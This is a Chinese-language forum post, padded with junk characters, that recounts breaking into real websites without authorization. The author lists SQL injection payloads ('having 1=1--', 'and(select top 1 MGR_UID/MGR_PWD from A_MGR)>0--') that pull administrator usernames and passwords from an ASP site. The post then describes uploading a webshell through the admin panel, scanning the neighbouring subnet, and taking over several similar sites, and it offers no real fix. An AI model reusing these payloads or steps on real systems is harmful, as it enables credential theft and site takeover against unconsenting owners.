发现一个注入点
$ Q( J- s/ F% M5 f+ y) c! ?http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
h9 A9 |2 Q/ O" A7 A* S! z8 A+ ~4 V3 v5 B: r! ?, F( z, y' m$ e
习惯性的加’having1=1--
. d+ ^. H) F7 Q; O1 i3 D2 m7 n$ L. S6 @% K" u
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—9 L C$ ]; [7 e4 t" Z
" Z H* j( f5 E* p
0' a: A" o/ o' n- }5 C8 k1 v6 v
& p6 X) q7 {( F. W; ?0 ^
爆出Diary_A.dl_Title(这时候很激动啊)- \% w8 {" |4 f4 G3 o3 L
/ I! Z6 c8 {- V7 g$ @
那么继续% |! E. l- t f, J) l
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—# X# ]/ Q M7 |
$ S' \ y \: {4 U6 b! L继续,一直爆下去
, V% Q! a! O% c; |, l& T
1 B$ O, p: G/ i0 Z# S4 }/ r6 s爆到几个字段和表段 但是没找到需要的管理用户的字段
; Y2 u7 i* R* n+ Z
6 v; D g# f1 R* F' |( I. M蛋疼了 怎么办 然后去后台登陆页看源码
1 z1 n2 t$ f- W7 x7 g9 L& S+ i3 |& k; f5 r3 _3 l! Y
0+ j6 X6 t L' _$ V* ?& V
$ P7 R! q* F! @" t( l
Input name= “ADUID”7 f! Q% ~- ^- v9 z1 }7 N
Input name= “ADPWD”
9 P7 b, `7 O' t d) \4 K) R9 w6 @4 e) |( P$ s( Z# e- p
很幸运 找到了字段那就继续/ @! W9 p) a7 Y. h3 M2 D3 O
找到之后开始爆用户) Y' C7 T2 S' f' q
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—+ ~8 J1 W# l: t' ^" h
爆密码1 a- e* c" m' v- w* |# S) v
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
% q% ^2 T+ [6 H7 K# Q测试了下 这个注入点只能爆到文章哪里的表 . w1 L ] `, _$ G
; v3 k- @; D N `5 S* F; a/ q6 g5 C
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
4 C( J0 q+ a. t3 `* r2 |
0 h' d* ~8 D% i又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
0 O5 T, \8 I. ]# f5 Q# s6 c& l. r& L, K
473
( Y( c3 |8 v1 o& @
5 I; d1 h8 o3 \2 Q( ]* \进后台5 R9 H* c) b+ M! W$ A$ ?
) H7 o; J" A2 }
% j. v5 G4 |) |5 @1 O# p发现几个上传点 有的地方不能上传 而且防止恶意代码
3 |* |) T- E) e) |2 a5 |: z
/ {4 S7 P" I1 s9 G$ h没办法 各种百度各种找大牛 找到一只好像可以突破的马
, h1 f" O0 t, I+ F! H* }# u" r: p- E3 [) p9 e |- X: [
* w5 D0 w+ x. b) T( O! s在系统管理那里直接上传 不过没有显示地址) r& y* F- Q4 l+ _2 @" k7 B+ ~# v
+ H: b4 } |+ d0 _$ |6 W再上传一次 抓包 搞定OK5 Y6 w, Q! E- ]* [
( V4 e) Z9 t- s1 b/ Q* J# f8 l8 y
0 i0 t7 s' t& x% _/ @
4 R7 q: K9 O1 ~, \( E0 E0 l1 n472 y2 d( T% r( ]4 `: U" Z
# e) r9 t. N0 v( Z7 f
晚上不行了 去睡觉。。。& {; Q7 G8 [1 h, A$ `2 u
第二天刚起床 闲的没事做继续日站吧 ) U' }" T/ `" Q$ H8 s! Y; y
9 [2 w# h5 p: b3 z9 A; [' Y3 j) v' B' U找个站 就把这个站的旁c扫了下% C4 Y" [. t) \' V0 U
9 T E! E# N- _/ I9 q
发现c段也有一个购物站 ,然后还和这个站的模板差不多
" H- o9 H7 I+ b* L2 n+ j2 X; Y, B* n# |/ f
就找到会员登录口测试
9 H G$ E F5 W0 U3 @( Q3 @* Y- T8 m; y5 Y" A" K' K
'and (select top 1 MGR_UID from A_MGR)>0—
& [7 B6 e, B# t果断爆到了 这时候我很激动 通杀
% x8 y& q9 g: V$ _: M( h. n0 \2 @4 h2 q4 q$ I7 ?7 }
再次翻c段: N4 w! J- Y' P1 K* T
! h3 @ a( o6 q4 N) G, J; U
翻出几个站 都成功拿下
4 A% D" n. A6 p3 v5 o% {2 C& `
2 \6 I/ B' F$ Z6 t z( d( g9 v/ M5 Z$ k* |6 T
7 T, G1 I+ |3 H, C修复方案:4 |" a5 n! F' Q
他们比我专业
m+ h4 O7 |' s& F. J
* a5 f0 V5 c) A! x9 }$ \9 T* T8 Q w: J
- q2 ~0 u) ?0 p! f
+ P! `" N/ I8 ~' E2 Y1 U- e |